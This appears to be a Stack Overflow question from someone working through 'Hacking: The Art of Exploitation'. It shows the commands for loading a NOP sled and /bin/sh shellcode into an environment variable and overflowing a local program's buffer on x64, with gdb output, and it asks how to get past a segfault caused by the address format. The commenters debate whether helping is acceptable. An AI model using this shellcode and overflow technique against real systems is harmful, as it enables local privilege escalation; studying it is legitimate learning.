# Executing the shellcode in x64 causes segmentation fault

Tags: c, memory, gdb, x86-64, cpu-registers

I've been trying to execute a shellcode on my machine through enviromental variables. I have it here:

```
[avaxio@parrot]─[~/Desktop/hax]
└──╼ $export SHELLCODE=$(perl -e 'print "\x90"x200')$(cat shellcode.bin)
┌─[avaxio@parrot]─[~/Desktop/hax]
└──╼ $echo $SHELLCODE
��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������1�1�1ə��̀j
                                                 XQh//shh/bin��Q��S��̀
```

Then I find where it is in my target program:

```
0x7fffae179437: "SHELLCODE=", '\220' <repeats 190 times>...
0x7fffae1794ff: "\220\220\220\220\220\220\220\220\220\220\061\300\061\333\061ə\260\244̀j\vXQh//shh/bin\211\343Q\211\342S\211\341̀"
0x7fffae17952d: "COLORTERM=truecolor"
```

After that I am trying to cause buffer overflow through posting it's adress to the input. Let's look at the gdb results, since there the programm is not working:

```
$sudo gdb -q ./notesearch
Reading symbols from ./notesearch...(no debugging symbols found)...done.
(gdb) run $(perl -e 'print "\x4f\x94\x17\xae\xff\x7f"'x20)
Starting program: /home/avaxio/Desktop/hax/notesearch $(perl -e 'print "\x4f\x94\x17\xae\xff\x7f"'x20)
[DEBUG] found a 2 byte note for user id 0
-------[ end of note data ]-------

Program received signal SIGSEGV, Segmentation fault.
0x0000564b323d4455 in main ()
```

Now, since I got segmentation fault I wanna look what's going on with my registers, so I look:

```
    (gdb) i reg
    rax            0x0                 0
    rbx            0x0                 0
    rcx            0x7fd64a625ec4      140558347689668
    rdx            0x7fd64a6f88c0      140558348552384
    rsi            0x564b33d27260      94880991965792
    rdi            0x3                 3
    rbp            0x7fffae17944f7fff  0x7fffae17944f7fff
    rsp            0x7ffd7e9992a8      0x7ffd7e9992a8
    r8             0x7fd64a6fd500      140558348571904
    r9             0x5b2d2d2d2d2d2d2d  6569957103458135341
    r10            0x0                 0
    r11            0x246               582
    r12            0x564b323d4120      94880965411104
    r13            0x7ffd7e999380      140726727447424
    r14            0x0                 0
    r15            0x0                 0
    rip            0x564b323d4455      0x564b323d4455 <main+179>
    eflags         0x10207             [ CF PF IF RF ]
    cs             0x33                51
    ss             0x2b                43
    ds             0x0                 0
    es             0x0                 0
    fs             0x0                 0
```

And if I look at the base pointer I see that 
rbp            0x**7fffae17944f**7fff  0x**7fffae17944f**7fff

That means that the script is working correctly, but register has two additional bits. And after I spam this address 20 times, it turns out that **first two bits of address** are overflowing **two last bits of register**, which is surely to cause segmentation fault, since there are no data on 0x7fffae17944f7fff.

I know that the address of the `SHELLCODE` variable is 0x7fffae1794**37** and not 0x7fffae1794**4f** with that I just want to get somewhere closer to the middle of NOP. I've tried to send null bytes, but as it turns out bash forbidds sending them and just ignors them. So I want to know - is it possible to do such type of attack on x64 architecture? Maybe there is a way to make an enviromental variable 8 bytes long instead of 6? Or maybe there is a way to send null bytes in the beginning, so I could get rbp value something like 0x00007fffae17944f? Or maybe there are some other ways to do so? Doing this only for study, as I am learning from the book :)

Comment: looks like your trying to write malicious code.  We will NOT help you to write malicious code.

Comment: It's from the book "hacking the art of exploitation", no malicious acts are here :D

Comment: @user3629249: understanding how exploits work is necessary to develop strategies to mitigate them.  And to analyze / audit programs for known common vulnerabilities.

Comment: It's hard to follow what you are doing. Consider adding all the steps and assumptions: on x86-64 a simple buffer overflow is generally not exploitable thanks to the basic level of protection available (XD, ASLR).